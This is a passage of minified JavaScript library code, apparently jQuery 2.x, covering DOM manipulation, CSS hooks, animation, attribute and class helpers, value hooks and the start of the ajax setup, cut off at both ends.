c=0,d=a.length;d>c;c++)L.set(a[c],"globalEval",!b||L.get(b[c],"globalEval"))}function nb(a,b){var c,d,e,f,g,h,i,j;if(1===b.nodeType){if(L.hasData(a)&&(f=L.access(a),g=L.set(b,f),j=f.events)){delete g.handle,g.events={};for(e in j)for(c=0,d=j[e].length;d>c;c++)n.event.add(b,e,j[e][c])}M.hasData(a)&&(h=M.access(a),i=n.extend({},h),M.set(b,i))}}function ob(a,b){var c=a.getElementsByTagName?a.getElementsByTagName(b||"*"):a.querySelectorAll?a.querySelectorAll(b||"*"):[];return void 0===b||b&&n.nodeName(a,b)?n.merge([a],c):c}function pb(a,b){var c=b.nodeName.toLowerCase();"input"===c&&T.test(a.type)?b.checked=a.checked:("input"===c||"textarea"===c)&&(b.defaultValue=a.defaultValue)}n.extend({clone:function(a,b,c){var d,e,f,g,h=a.cloneNode(!0),i=n.contains(a.ownerDocument,a);if(!(k.noCloneChecked||1!==a.nodeType&&11!==a.nodeType||n.isXMLDoc(a)))for(g=ob(h),f=ob(a),d=0,e=f.length;e>d;d++)pb(f[d],g[d]);if(b)if(c)for(f=f||ob(a),g=g||ob(h),d=0,e=f.length;e>d;d++)nb(f[d],g[d]);else nb(a,h);return g=ob(h,"script"),g.length>0&&mb(g,!i&&ob(a,"script")),h},buildFragment:function(a,b,c,d){for(var e,f,g,h,i,j,k=b.createDocumentFragment(),l=[],m=0,o=a.length;o>m;m++)if(e=a[m],e||0===e)if("object"===n.type(e))n.merge(l,e.nodeType?[e]:e);else if(cb.test(e)){f=f||k.appendChild(b.createElement("div")),g=(bb.exec(e)||["",""])[1].toLowerCase(),h=ib[g]||ib._default,f.innerHTML=h[1]+e.replace(ab,"<$1></$2>")+h[2],j=h[0];while(j--)f=f.lastChild;n.merge(l,f.childNodes),f=k.firstChild,f.textContent=""}else l.push(b.createTextNode(e));k.textContent="",m=0;while(e=l[m++])if((!d||-1===n.inArray(e,d))&&(i=n.contains(e.ownerDocument,e),f=ob(k.appendChild(e),"script"),i&&mb(f),c)){j=0;while(e=f[j++])fb.test(e.type||"")&&c.push(e)}return k},cleanData:function(a){for(var b,c,d,e,f=n.event.special,g=0;void 0!==(c=a[g]);g++){if(n.acceptData(c)&&(e=c[L.expando],e&&(b=L.cache[e]))){if(b.events)for(d in b.events)f[d]?n.event.remove(c,d):n.removeEvent(c,d,b.handle);L.cache[e]&&delete L.cache[e]}delete M.cache[c[M.expando]]}}}),n.fn.extend({text:function(a){return J(this,function(a){return void 0===a?n.text(this):this.empty().each(function(){(1===this.nodeType||11===this.nodeType||9===this.nodeType)&&(this.textContent=a)})},null,a,arguments.length)},append:function(){return this.domManip(arguments,function(a){if(1===this.nodeType||11===this.nodeType||9===this.nodeType){var b=jb(this,a);b.appendChild(a)}})},prepend:function(){return this.domManip(arguments,function(a){if(1===this.nodeType||11===this.nodeType||9===this.nodeType){var b=jb(this,a);b.insertBefore(a,b.firstChild)}})},before:function(){return this.domManip(arguments,function(a){this.parentNode&&this.parentNode.insertBefore(a,this)})},after:function(){return this.domManip(arguments,function(a){this.parentNode&&this.parentNode.insertBefore(a,this.nextSibling)})},remove:function(a,b){for(var c,d=a?n.filter(a,this):this,e=0;null!=(c=d[e]);e++)b||1!==c.nodeType||n.cleanData(ob(c)),c.parentNode&&(b&&n.contains(c.ownerDocument,c)&&mb(ob(c,"script")),c.parentNode.removeChild(c));return this},empty:function(){for(var a,b=0;null!=(a=this[b]);b++)1===a.nodeType&&(n.cleanData(ob(a,!1)),a.textContent="");return this},clone:function(a,b){return a=null==a?!1:a,b=null==b?a:b,this.map(function(){return n.clone(this,a,b)})},html:function(a){return J(this,function(a){var b=this[0]||{},c=0,d=this.length;if(void 0===a&&1===b.nodeType)return b.innerHTML;if("string"==typeof a&&!db.test(a)&&!ib[(bb.exec(a)||["",""])[1].toLowerCase()]){a=a.replace(ab,"<$1></$2>");try{for(;d>c;c++)b=this[c]||{},1===b.nodeType&&(n.cleanData(ob(b,!1)),b.innerHTML=a);b=0}catch(e){}}b&&this.empty().append(a)},null,a,arguments.length)},replaceWith:function(){var a=arguments[0];return this.domManip(arguments,function(b){a=this.parentNode,n.cleanData(ob(this)),a&&a.replaceChild(b,this)}),a&&(a.length||a.nodeType)?this:this.remove()},detach:function(a){return this.remove(a,!0)},domManip:function(a,b){a=e.apply([],a);var c,d,f,g,h,i,j=0,l=this.length,m=this,o=l-1,p=a[0],q=n.isFunction(p);if(q||l>1&&"string"==typeof p&&!k.checkClone&&eb.test(p))return this.each(function(c){var d=m.eq(c);q&&(a[0]=p.call(this,c,d.html())),d.domManip(a,b)});if(l&&(c=n.buildFragment(a,this[0].ownerDocument,!1,this),d=c.firstChild,1===c.childNodes.length&&(c=d),d)){for(f=n.map(ob(c,"script"),kb),g=f.length;l>j;j++)h=c,j!==o&&(h=n.clone(h,!0,!0),g&&n.merge(f,ob(h,"script"))),b.call(this[j],h,j);if(g)for(i=f[f.length-1].ownerDocument,n.map(f,lb),j=0;g>j;j++)h=f[j],fb.test(h.type||"")&&!L.access(h,"globalEval")&&n.contains(i,h)&&(h.src?n._evalUrl&&n._evalUrl(h.src):n.globalEval(h.textContent.replace(hb,"")))}return this}}),n.each({appendTo:"append",prependTo:"prepend",insertBefore:"before",insertAfter:"after",replaceAll:"replaceWith"},function(a,b){n.fn[a]=function(a){for(var c,d=[],e=n(a),g=e.length-1,h=0;g>=h;h++)c=h===g?this:this.clone(!0),n(e[h])[b](c),f.apply(d,c.get());return this.pushStack(d)}});var qb,rb={};function sb(b,c){var d,e=n(c.createElement(b)).appendTo(c.body),f=a.getDefaultComputedStyle&&(d=a.getDefaultComputedStyle(e[0]))?d.display:n.css(e[0],"display");return e.detach(),f}function tb(a){var b=l,c=rb[a];return c||(c=sb(a,b),"none"!==c&&c||(qb=(qb||n("<iframe frameborder='0' width='0' height='0'/>")).appendTo(b.documentElement),b=qb[0].contentDocument,b.write(),b.close(),c=sb(a,b),qb.detach()),rb[a]=c),c}var ub=/^margin/,vb=new RegExp("^("+Q+")(?!px)[a-z%]+$","i"),wb=function(b){return b.ownerDocument.defaultView.opener?b.ownerDocument.defaultView.getComputedStyle(b,null):a.getComputedStyle(b,null)};function xb(a,b,c){var d,e,f,g,h=a.style;return c=c||wb(a),c&&(g=c.getPropertyValue(b)||c[b]),c&&(""!==g||n.contains(a.ownerDocument,a)||(g=n.style(a,b)),vb.test(g)&&ub.test(b)&&(d=h.width,e=h.minWidth,f=h.maxWidth,h.minWidth=h.maxWidth=h.width=g,g=c.width,h.width=d,h.minWidth=e,h.maxWidth=f)),void 0!==g?g+"":g}function yb(a,b){return{get:function(){return a()?void delete this.get:(this.get=b).apply(this,arguments)}}}!function(){var b,c,d=l.documentElement,e=l.createElement("div"),f=l.createElement("div");if(f.style){f.style.backgroundClip="content-box",f.cloneNode(!0).style.backgroundClip="",k.clearCloneStyle="content-box"===f.style.backgroundClip,e.style.cssText="border:0;width:0;height:0;top:0;left:-9999px;margin-top:1px;position:absolute",e.appendChild(f);function g(){f.style.cssText="-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box;display:block;margin-top:1%;top:1%;border:1px;padding:1px;width:4px;position:absolute",f.innerHTML="",d.appendChild(e);var g=a.getComputedStyle(f,null);b="1%"!==g.top,c="4px"===g.width,d.removeChild(e)}a.getComputedStyle&&n.extend(k,{pixelPosition:function(){return g(),b},boxSizingReliable:function(){return null==c&&g(),c},reliableMarginRight:function(){var b,c=f.appendChild(l.createElement("div"));return c.style.cssText=f.style.cssText="-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;display:block;margin:0;border:0;padding:0",c.style.marginRight=c.style.width="0",f.style.width="1px",d.appendChild(e),b=!parseFloat(a.getComputedStyle(c,null).marginRight),d.removeChild(e),f.removeChild(c),b}})}}(),n.swap=function(a,b,c,d){var e,f,g={};for(f in b)g[f]=a.style[f],a.style[f]=b[f];e=c.apply(a,d||[]);for(f in b)a.style[f]=g[f];return e};var zb=/^(none|table(?!-c[ea]).+)/,Ab=new RegExp("^("+Q+")(.*)$","i"),Bb=new RegExp("^([+-])=("+Q+")","i"),Cb={position:"absolute",visibility:"hidden",display:"block"},Db={letterSpacing:"0",fontWeight:"400"},Eb=["Webkit","O","Moz","ms"];function Fb(a,b){if(b in a)return b;var c=b[0].toUpperCase()+b.slice(1),d=b,e=Eb.length;while(e--)if(b=Eb[e]+c,b in a)return b;return d}function Gb(a,b,c){var d=Ab.exec(b);return d?Math.max(0,d[1]-(c||0))+(d[2]||"px"):b}function Hb(a,b,c,d,e){for(var f=c===(d?"border":"content")?4:"width"===b?1:0,g=0;4>f;f+=2)"margin"===c&&(g+=n.css(a,c+R[f],!0,e)),d?("content"===c&&(g-=n.css(a,"padding"+R[f],!0,e)),"margin"!==c&&(g-=n.css(a,"border"+R[f]+"Width",!0,e))):(g+=n.css(a,"padding"+R[f],!0,e),"padding"!==c&&(g+=n.css(a,"border"+R[f]+"Width",!0,e)));return g}function Ib(a,b,c){var d=!0,e="width"===b?a.offsetWidth:a.offsetHeight,f=wb(a),g="border-box"===n.css(a,"boxSizing",!1,f);if(0>=e||null==e){if(e=xb(a,b,f),(0>e||null==e)&&(e=a.style[b]),vb.test(e))return e;d=g&&(k.boxSizingReliable()||e===a.style[b]),e=parseFloat(e)||0}return e+Hb(a,b,c||(g?"border":"content"),d,f)+"px"}function Jb(a,b){for(var c,d,e,f=[],g=0,h=a.length;h>g;g++)d=a[g],d.style&&(f[g]=L.get(d,"olddisplay"),c=d.style.display,b?(f[g]||"none"!==c||(d.style.display=""),""===d.style.display&&S(d)&&(f[g]=L.access(d,"olddisplay",tb(d.nodeName)))):(e=S(d),"none"===c&&e||L.set(d,"olddisplay",e?c:n.css(d,"display"))));for(g=0;h>g;g++)d=a[g],d.style&&(b&&"none"!==d.style.display&&""!==d.style.display||(d.style.display=b?f[g]||"":"none"));return a}n.extend({cssHooks:{opacity:{get:function(a,b){if(b){var c=xb(a,"opacity");return""===c?"1":c}}}},cssNumber:{columnCount:!0,fillOpacity:!0,flexGrow:!0,flexShrink:!0,fontWeight:!0,lineHeight:!0,opacity:!0,order:!0,orphans:!0,widows:!0,zIndex:!0,zoom:!0},cssProps:{"float":"cssFloat"},style:function(a,b,c,d){if(a&&3!==a.nodeType&&8!==a.nodeType&&a.style){var e,f,g,h=n.camelCase(b),i=a.style;return b=n.cssProps[h]||(n.cssProps[h]=Fb(i,h)),g=n.cssHooks[b]||n.cssHooks[h],void 0===c?g&&"get"in g&&void 0!==(e=g.get(a,!1,d))?e:i[b]:(f=typeof c,"string"===f&&(e=Bb.exec(c))&&(c=(e[1]+1)*e[2]+parseFloat(n.css(a,b)),f="number"),null!=c&&c===c&&("number"!==f||n.cssNumber[h]||(c+="px"),k.clearCloneStyle||""!==c||0!==b.indexOf("background")||(i[b]="inherit"),g&&"set"in g&&void 0===(c=g.set(a,c,d))||(i[b]=c)),void 0)}},css:function(a,b,c,d){var e,f,g,h=n.camelCase(b);return b=n.cssProps[h]||(n.cssProps[h]=Fb(a.style,h)),g=n.cssHooks[b]||n.cssHooks[h],g&&"get"in g&&(e=g.get(a,!0,c)),void 0===e&&(e=xb(a,b,d)),"normal"===e&&b in Db&&(e=Db[b]),""===c||c?(f=parseFloat(e),c===!0||n.isNumeric(f)?f||0:e):e}}),n.each(["height","width"],function(a,b){n.cssHooks[b]={get:function(a,c,d){return c?zb.test(n.css(a,"display"))&&0===a.offsetWidth?n.swap(a,Cb,function(){return Ib(a,b,d)}):Ib(a,b,d):void 0},set:function(a,c,d){var e=d&&wb(a);return Gb(a,c,d?Hb(a,b,d,"border-box"===n.css(a,"boxSizing",!1,e),e):0)}}}),n.cssHooks.marginRight=yb(k.reliableMarginRight,function(a,b){return b?n.swap(a,{display:"inline-block"},xb,[a,"marginRight"]):void 0}),n.each({margin:"",padding:"",border:"Width"},function(a,b){n.cssHooks[a+b]={expand:function(c){for(var d=0,e={},f="string"==typeof c?c.split(" "):[c];4>d;d++)e[a+R[d]+b]=f[d]||f[d-2]||f[0];return e}},ub.test(a)||(n.cssHooks[a+b].set=Gb)}),n.fn.extend({css:function(a,b){return J(this,function(a,b,c){var d,e,f={},g=0;if(n.isArray(b)){for(d=wb(a),e=b.length;e>g;g++)f[b[g]]=n.css(a,b[g],!1,d);return f}return void 0!==c?n.style(a,b,c):n.css(a,b)},a,b,arguments.length>1)},show:function(){return Jb(this,!0)},hide:function(){return Jb(this)},toggle:function(a){return"boolean"==typeof a?a?this.show():this.hide():this.each(function(){S(this)?n(this).show():n(this).hide()})}});function Kb(a,b,c,d,e){return new Kb.prototype.init(a,b,c,d,e)}n.Tween=Kb,Kb.prototype={constructor:Kb,init:function(a,b,c,d,e,f){this.elem=a,this.prop=c,this.easing=e||"swing",this.options=b,this.start=this.now=this.cur(),this.end=d,this.unit=f||(n.cssNumber[c]?"":"px")},cur:function(){var a=Kb.propHooks[this.prop];return a&&a.get?a.get(this):Kb.propHooks._default.get(this)},run:function(a){var b,c=Kb.propHooks[this.prop];return this.pos=b=this.options.duration?n.easing[this.easing](a,this.options.duration*a,0,1,this.options.duration):a,this.now=(this.end-this.start)*b+this.start,this.options.step&&this.options.step.call(this.elem,this.now,this),c&&c.set?c.set(this):Kb.propHooks._default.set(this),this}},Kb.prototype.init.prototype=Kb.prototype,Kb.propHooks={_default:{get:function(a){var b;return null==a.elem[a.prop]||a.elem.style&&null!=a.elem.style[a.prop]?(b=n.css(a.elem,a.prop,""),b&&"auto"!==b?b:0):a.elem[a.prop]},set:function(a){n.fx.step[a.prop]?n.fx.step[a.prop](a):a.elem.style&&(null!=a.elem.style[n.cssProps[a.prop]]||n.cssHooks[a.prop])?n.style(a.elem,a.prop,a.now+a.unit):a.elem[a.prop]=a.now}}},Kb.propHooks.scrollTop=Kb.propHooks.scrollLeft={set:function(a){a.elem.nodeType&&a.elem.parentNode&&(a.elem[a.prop]=a.now)}},n.easing={linear:function(a){return a},swing:function(a){return.5-Math.cos(a*Math.PI)/2}},n.fx=Kb.prototype.init,n.fx.step={};var Lb,Mb,Nb=/^(?:toggle|show|hide)$/,Ob=new RegExp("^(?:([+-])=|)("+Q+")([a-z%]*)$","i"),Pb=/queueHooks$/,Qb=[Vb],Rb={"*":[function(a,b){var c=this.createTween(a,b),d=c.cur(),e=Ob.exec(b),f=e&&e[3]||(n.cssNumber[a]?"":"px"),g=(n.cssNumber[a]||"px"!==f&&+d)&&Ob.exec(n.css(c.elem,a)),h=1,i=20;if(g&&g[3]!==f){f=f||g[3],e=e||[],g=+d||1;do h=h||".5",g/=h,n.style(c.elem,a,g+f);while(h!==(h=c.cur()/d)&&1!==h&&--i)}return e&&(g=c.start=+g||+d||0,c.unit=f,c.end=e[1]?g+(e[1]+1)*e[2]:+e[2]),c}]};function Sb(){return setTimeout(function(){Lb=void 0}),Lb=n.now()}function Tb(a,b){var c,d=0,e={height:a};for(b=b?1:0;4>d;d+=2-b)c=R[d],e["margin"+c]=e["padding"+c]=a;return b&&(e.opacity=e.width=a),e}function Ub(a,b,c){for(var d,e=(Rb[b]||[]).concat(Rb["*"]),f=0,g=e.length;g>f;f++)if(d=e[f].call(c,b,a))return d}function Vb(a,b,c){var d,e,f,g,h,i,j,k,l=this,m={},o=a.style,p=a.nodeType&&S(a),q=L.get(a,"fxshow");c.queue||(h=n._queueHooks(a,"fx"),null==h.unqueued&&(h.unqueued=0,i=h.empty.fire,h.empty.fire=function(){h.unqueued||i()}),h.unqueued++,l.always(function(){l.always(function(){h.unqueued--,n.queue(a,"fx").length||h.empty.fire()})})),1===a.nodeType&&("height"in b||"width"in b)&&(c.overflow=[o.overflow,o.overflowX,o.overflowY],j=n.css(a,"display"),k="none"===j?L.get(a,"olddisplay")||tb(a.nodeName):j,"inline"===k&&"none"===n.css(a,"float")&&(o.display="inline-block")),c.overflow&&(o.overflow="hidden",l.always(function(){o.overflow=c.overflow[0],o.overflowX=c.overflow[1],o.overflowY=c.overflow[2]}));for(d in b)if(e=b[d],Nb.exec(e)){if(delete b[d],f=f||"toggle"===e,e===(p?"hide":"show")){if("show"!==e||!q||void 0===q[d])continue;p=!0}m[d]=q&&q[d]||n.style(a,d)}else j=void 0;if(n.isEmptyObject(m))"inline"===("none"===j?tb(a.nodeName):j)&&(o.display=j);else{q?"hidden"in q&&(p=q.hidden):q=L.access(a,"fxshow",{}),f&&(q.hidden=!p),p?n(a).show():l.done(function(){n(a).hide()}),l.done(function(){var b;L.remove(a,"fxshow");for(b in m)n.style(a,b,m[b])});for(d in m)g=Ub(p?q[d]:0,d,l),d in q||(q[d]=g.start,p&&(g.end=g.start,g.start="width"===d||"height"===d?1:0))}}function Wb(a,b){var c,d,e,f,g;for(c in a)if(d=n.camelCase(c),e=b[d],f=a[c],n.isArray(f)&&(e=f[1],f=a[c]=f[0]),c!==d&&(a[d]=f,delete a[c]),g=n.cssHooks[d],g&&"expand"in g){f=g.expand(f),delete a[d];for(c in f)c in a||(a[c]=f[c],b[c]=e)}else b[d]=e}function Xb(a,b,c){var d,e,f=0,g=Qb.length,h=n.Deferred().always(function(){delete i.elem}),i=function(){if(e)return!1;for(var b=Lb||Sb(),c=Math.max(0,j.startTime+j.duration-b),d=c/j.duration||0,f=1-d,g=0,i=j.tweens.length;i>g;g++)j.tweens[g].run(f);return h.notifyWith(a,[j,f,c]),1>f&&i?c:(h.resolveWith(a,[j]),!1)},j=h.promise({elem:a,props:n.extend({},b),opts:n.extend(!0,{specialEasing:{}},c),originalProperties:b,originalOptions:c,startTime:Lb||Sb(),duration:c.duration,tweens:[],createTween:function(b,c){var d=n.Tween(a,j.opts,b,c,j.opts.specialEasing[b]||j.opts.easing);return j.tweens.push(d),d},stop:function(b){var c=0,d=b?j.tweens.length:0;if(e)return this;for(e=!0;d>c;c++)j.tweens[c].run(1);return b?h.resolveWith(a,[j,b]):h.rejectWith(a,[j,b]),this}}),k=j.props;for(Wb(k,j.opts.specialEasing);g>f;f++)if(d=Qb[f].call(j,a,k,j.opts))return d;return n.map(k,Ub,j),n.isFunction(j.opts.start)&&j.opts.start.call(a,j),n.fx.timer(n.extend(i,{elem:a,anim:j,queue:j.opts.queue})),j.progress(j.opts.progress).done(j.opts.done,j.opts.complete).fail(j.opts.fail).always(j.opts.always)}n.Animation=n.extend(Xb,{tweener:function(a,b){n.isFunction(a)?(b=a,a=["*"]):a=a.split(" ");for(var c,d=0,e=a.length;e>d;d++)c=a[d],Rb[c]=Rb[c]||[],Rb[c].unshift(b)},prefilter:function(a,b){b?Qb.unshift(a):Qb.push(a)}}),n.speed=function(a,b,c){var d=a&&"object"==typeof a?n.extend({},a):{complete:c||!c&&b||n.isFunction(a)&&a,duration:a,easing:c&&b||b&&!n.isFunction(b)&&b};return d.duration=n.fx.off?0:"number"==typeof d.duration?d.duration:d.duration in n.fx.speeds?n.fx.speeds[d.duration]:n.fx.speeds._default,(null==d.queue||d.queue===!0)&&(d.queue="fx"),d.old=d.complete,d.complete=function(){n.isFunction(d.old)&&d.old.call(this),d.queue&&n.dequeue(this,d.queue)},d},n.fn.extend({fadeTo:function(a,b,c,d){return this.filter(S).css("opacity",0).show().end().animate({opacity:b},a,c,d)},animate:function(a,b,c,d){var e=n.isEmptyObject(a),f=n.speed(b,c,d),g=function(){var b=Xb(this,n.extend({},a),f);(e||L.get(this,"finish"))&&b.stop(!0)};return g.finish=g,e||f.queue===!1?this.each(g):this.queue(f.queue,g)},stop:function(a,b,c){var d=function(a){var b=a.stop;delete a.stop,b(c)};return"string"!=typeof a&&(c=b,b=a,a=void 0),b&&a!==!1&&this.queue(a||"fx",[]),this.each(function(){var b=!0,e=null!=a&&a+"queueHooks",f=n.timers,g=L.get(this);if(e)g[e]&&g[e].stop&&d(g[e]);else for(e in g)g[e]&&g[e].stop&&Pb.test(e)&&d(g[e]);for(e=f.length;e--;)f[e].elem!==this||null!=a&&f[e].queue!==a||(f[e].anim.stop(c),b=!1,f.splice(e,1));(b||!c)&&n.dequeue(this,a)})},finish:function(a){return a!==!1&&(a=a||"fx"),this.each(function(){var b,c=L.get(this),d=c[a+"queue"],e=c[a+"queueHooks"],f=n.timers,g=d?d.length:0;for(c.finish=!0,n.queue(this,a,[]),e&&e.stop&&e.stop.call(this,!0),b=f.length;b--;)f[b].elem===this&&f[b].queue===a&&(f[b].anim.stop(!0),f.splice(b,1));for(b=0;g>b;b++)d[b]&&d[b].finish&&d[b].finish.call(this);delete c.finish})}}),n.each(["toggle","show","hide"],function(a,b){var c=n.fn[b];n.fn[b]=function(a,d,e){return null==a||"boolean"==typeof a?c.apply(this,arguments):this.animate(Tb(b,!0),a,d,e)}}),n.each({slideDown:Tb("show"),slideUp:Tb("hide"),slideToggle:Tb("toggle"),fadeIn:{opacity:"show"},fadeOut:{opacity:"hide"},fadeToggle:{opacity:"toggle"}},function(a,b){n.fn[a]=function(a,c,d){return this.animate(b,a,c,d)}}),n.timers=[],n.fx.tick=function(){var a,b=0,c=n.timers;for(Lb=n.now();b<c.length;b++)a=c[b],a()||c[b]!==a||c.splice(b--,1);c.length||n.fx.stop(),Lb=void 0},n.fx.timer=function(a){n.timers.push(a),a()?n.fx.start():n.timers.pop()},n.fx.interval=13,n.fx.start=function(){Mb||(Mb=setInterval(n.fx.tick,n.fx.interval))},n.fx.stop=function(){clearInterval(Mb),Mb=null},n.fx.speeds={slow:600,fast:200,_default:400},n.fn.delay=function(a,b){return a=n.fx?n.fx.speeds[a]||a:a,b=b||"fx",this.queue(b,function(b,c){var d=setTimeout(b,a);c.stop=function(){clearTimeout(d)}})},function(){var a=l.createElement("input"),b=l.createElement("select"),c=b.appendChild(l.createElement("option"));a.type="checkbox",k.checkOn=""!==a.value,k.optSelected=c.selected,b.disabled=!0,k.optDisabled=!c.disabled,a=l.createElement("input"),a.value="t",a.type="radio",k.radioValue="t"===a.value}();var Yb,Zb,$b=n.expr.attrHandle;n.fn.extend({attr:function(a,b){return J(this,n.attr,a,b,arguments.length>1)},removeAttr:function(a){return this.each(function(){n.removeAttr(this,a)})}}),n.extend({attr:function(a,b,c){var d,e,f=a.nodeType;if(a&&3!==f&&8!==f&&2!==f)return typeof a.getAttribute===U?n.prop(a,b,c):(1===f&&n.isXMLDoc(a)||(b=b.toLowerCase(),d=n.attrHooks[b]||(n.expr.match.bool.test(b)?Zb:Yb)),void 0===c?d&&"get"in d&&null!==(e=d.get(a,b))?e:(e=n.find.attr(a,b),null==e?void 0:e):null!==c?d&&"set"in d&&void 0!==(e=d.set(a,c,b))?e:(a.setAttribute(b,c+""),c):void n.removeAttr(a,b))
     4 +},removeAttr:function(a,b){var c,d,e=0,f=b&&b.match(E);if(f&&1===a.nodeType)while(c=f[e++])d=n.propFix[c]||c,n.expr.match.bool.test(c)&&(a[d]=!1),a.removeAttribute(c)},attrHooks:{type:{set:function(a,b){if(!k.radioValue&&"radio"===b&&n.nodeName(a,"input")){var c=a.value;return a.setAttribute("type",b),c&&(a.value=c),b}}}}}),Zb={set:function(a,b,c){return b===!1?n.removeAttr(a,c):a.setAttribute(c,c),c}},n.each(n.expr.match.bool.source.match(/\w+/g),function(a,b){var c=$b[b]||n.find.attr;$b[b]=function(a,b,d){var e,f;return d||(f=$b[b],$b[b]=e,e=null!=c(a,b,d)?b.toLowerCase():null,$b[b]=f),e}});var _b=/^(?:input|select|textarea|button)$/i;n.fn.extend({prop:function(a,b){return J(this,n.prop,a,b,arguments.length>1)},removeProp:function(a){return this.each(function(){delete this[n.propFix[a]||a]})}}),n.extend({propFix:{"for":"htmlFor","class":"className"},prop:function(a,b,c){var d,e,f,g=a.nodeType;if(a&&3!==g&&8!==g&&2!==g)return f=1!==g||!n.isXMLDoc(a),f&&(b=n.propFix[b]||b,e=n.propHooks[b]),void 0!==c?e&&"set"in e&&void 0!==(d=e.set(a,c,b))?d:a[b]=c:e&&"get"in e&&null!==(d=e.get(a,b))?d:a[b]},propHooks:{tabIndex:{get:function(a){return a.hasAttribute("tabindex")||_b.test(a.nodeName)||a.href?a.tabIndex:-1}}}}),k.optSelected||(n.propHooks.selected={get:function(a){var b=a.parentNode;return b&&b.parentNode&&b.parentNode.selectedIndex,null}}),n.each(["tabIndex","readOnly","maxLength","cellSpacing","cellPadding","rowSpan","colSpan","useMap","frameBorder","contentEditable"],function(){n.propFix[this.toLowerCase()]=this});var ac=/[\t\r\n\f]/g;n.fn.extend({addClass:function(a){var b,c,d,e,f,g,h="string"==typeof a&&a,i=0,j=this.length;if(n.isFunction(a))return this.each(function(b){n(this).addClass(a.call(this,b,this.className))});if(h)for(b=(a||"").match(E)||[];j>i;i++)if(c=this[i],d=1===c.nodeType&&(c.className?(" "+c.className+" ").replace(ac," "):" ")){f=0;while(e=b[f++])d.indexOf(" "+e+" ")<0&&(d+=e+" ");g=n.trim(d),c.className!==g&&(c.className=g)}return this},removeClass:function(a){var b,c,d,e,f,g,h=0===arguments.length||"string"==typeof a&&a,i=0,j=this.length;if(n.isFunction(a))return this.each(function(b){n(this).removeClass(a.call(this,b,this.className))});if(h)for(b=(a||"").match(E)||[];j>i;i++)if(c=this[i],d=1===c.nodeType&&(c.className?(" "+c.className+" ").replace(ac," "):"")){f=0;while(e=b[f++])while(d.indexOf(" "+e+" ")>=0)d=d.replace(" "+e+" "," ");g=a?n.trim(d):"",c.className!==g&&(c.className=g)}return this},toggleClass:function(a,b){var c=typeof a;return"boolean"==typeof b&&"string"===c?b?this.addClass(a):this.removeClass(a):this.each(n.isFunction(a)?function(c){n(this).toggleClass(a.call(this,c,this.className,b),b)}:function(){if("string"===c){var b,d=0,e=n(this),f=a.match(E)||[];while(b=f[d++])e.hasClass(b)?e.removeClass(b):e.addClass(b)}else(c===U||"boolean"===c)&&(this.className&&L.set(this,"__className__",this.className),this.className=this.className||a===!1?"":L.get(this,"__className__")||"")})},hasClass:function(a){for(var b=" "+a+" ",c=0,d=this.length;d>c;c++)if(1===this[c].nodeType&&(" "+this[c].className+" ").replace(ac," ").indexOf(b)>=0)return!0;return!1}});var bc=/\r/g;n.fn.extend({val:function(a){var b,c,d,e=this[0];{if(arguments.length)return d=n.isFunction(a),this.each(function(c){var e;1===this.nodeType&&(e=d?a.call(this,c,n(this).val()):a,null==e?e="":"number"==typeof e?e+="":n.isArray(e)&&(e=n.map(e,function(a){return null==a?"":a+""})),b=n.valHooks[this.type]||n.valHooks[this.nodeName.toLowerCase()],b&&"set"in b&&void 0!==b.set(this,e,"value")||(this.value=e))});if(e)return b=n.valHooks[e.type]||n.valHooks[e.nodeName.toLowerCase()],b&&"get"in b&&void 0!==(c=b.get(e,"value"))?c:(c=e.value,"string"==typeof c?c.replace(bc,""):null==c?"":c)}}}),n.extend({valHooks:{option:{get:function(a){var b=n.find.attr(a,"value");return null!=b?b:n.trim(n.text(a))}},select:{get:function(a){for(var b,c,d=a.options,e=a.selectedIndex,f="select-one"===a.type||0>e,g=f?null:[],h=f?e+1:d.length,i=0>e?h:f?e:0;h>i;i++)if(c=d[i],!(!c.selected&&i!==e||(k.optDisabled?c.disabled:null!==c.getAttribute("disabled"))||c.parentNode.disabled&&n.nodeName(c.parentNode,"optgroup"))){if(b=n(c).val(),f)return b;g.push(b)}return g},set:function(a,b){var c,d,e=a.options,f=n.makeArray(b),g=e.length;while(g--)d=e[g],(d.selected=n.inArray(d.value,f)>=0)&&(c=!0);return c||(a.selectedIndex=-1),f}}}}),n.each(["radio","checkbox"],function(){n.valHooks[this]={set:function(a,b){return n.isArray(b)?a.checked=n.inArray(n(a).val(),b)>=0:void 0}},k.checkOn||(n.valHooks[this].get=function(a){return null===a.getAttribute("value")?"on":a.value})}),n.each("blur focus focusin focusout load resize scroll unload click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup error contextmenu".split(" "),function(a,b){n.fn[b]=function(a,c){return arguments.length>0?this.on(b,null,a,c):this.trigger(b)}}),n.fn.extend({hover:function(a,b){return this.mouseenter(a).mouseleave(b||a)},bind:function(a,b,c){return this.on(a,null,b,c)},unbind:function(a,b){return this.off(a,null,b)},delegate:function(a,b,c,d){return this.on(b,a,c,d)},undelegate:function(a,b,c){return 1===arguments.length?this.off(a,"**"):this.off(b,a||"**",c)}});var cc=n.now(),dc=/\?/;n.parseJSON=function(a){return JSON.parse(a+"")},n.parseXML=function(a){var b,c;if(!a||"string"!=typeof a)return null;try{c=new DOMParser,b=c.parseFromString(a,"text/xml")}catch(d){b=void 0}return(!b||b.getElementsByTagName("parsererror").length)&&n.error("Invalid XML: "+a),b};var ec=/#.*$/,fc=/([?&])_=[^&]*/,gc=/^(.*?):[ \t]*([^\r\n]*)$/gm,hc=/^(?:about|app|app-storage|.+-extension|file|res|widget):$/,ic=/^(?:GET|HEAD)$/,jc=/^\/\//,kc=/^([\w.+-]+:)(?:\/\/(?:[^\/?#]*@|)([^\/?#:]*)(?::(\d+)|)|)/,lc={},mc={},nc="*/".concat("*"),oc=a.location.href,pc=kc.exec(oc.toLowerCase())||[];function qc(a){return function(b,c){"string"!=typeof b&&(c=b,b="*");var d,e=0,f=b.toLowerCase().match(E)||[];if(n.isFunction(c))while(d=f[e++])"+"===d[0]?(d=d.slice(1)||"*",(a[d]=a[d]||[]).unshift(c)):(a[d]=a[d]||[]).push(c)}}function rc(a,b,c,d){var e={},f=a===mc;function g(h){var i;return e[h]=!0,n.each(a[h]||[],function(a,h){var j=h(b,c,d);return"string"!=typeof j||f||e[j]?f?!(i=j):void 0:(b.dataTypes.unshift(j),g(j),!1)}),i}return g(b.dataTypes[0])||!e["*"]&&g("*")}function sc(a,b){var c,d,e=n.ajaxSettings.flatOptions||{};for(c in b)void 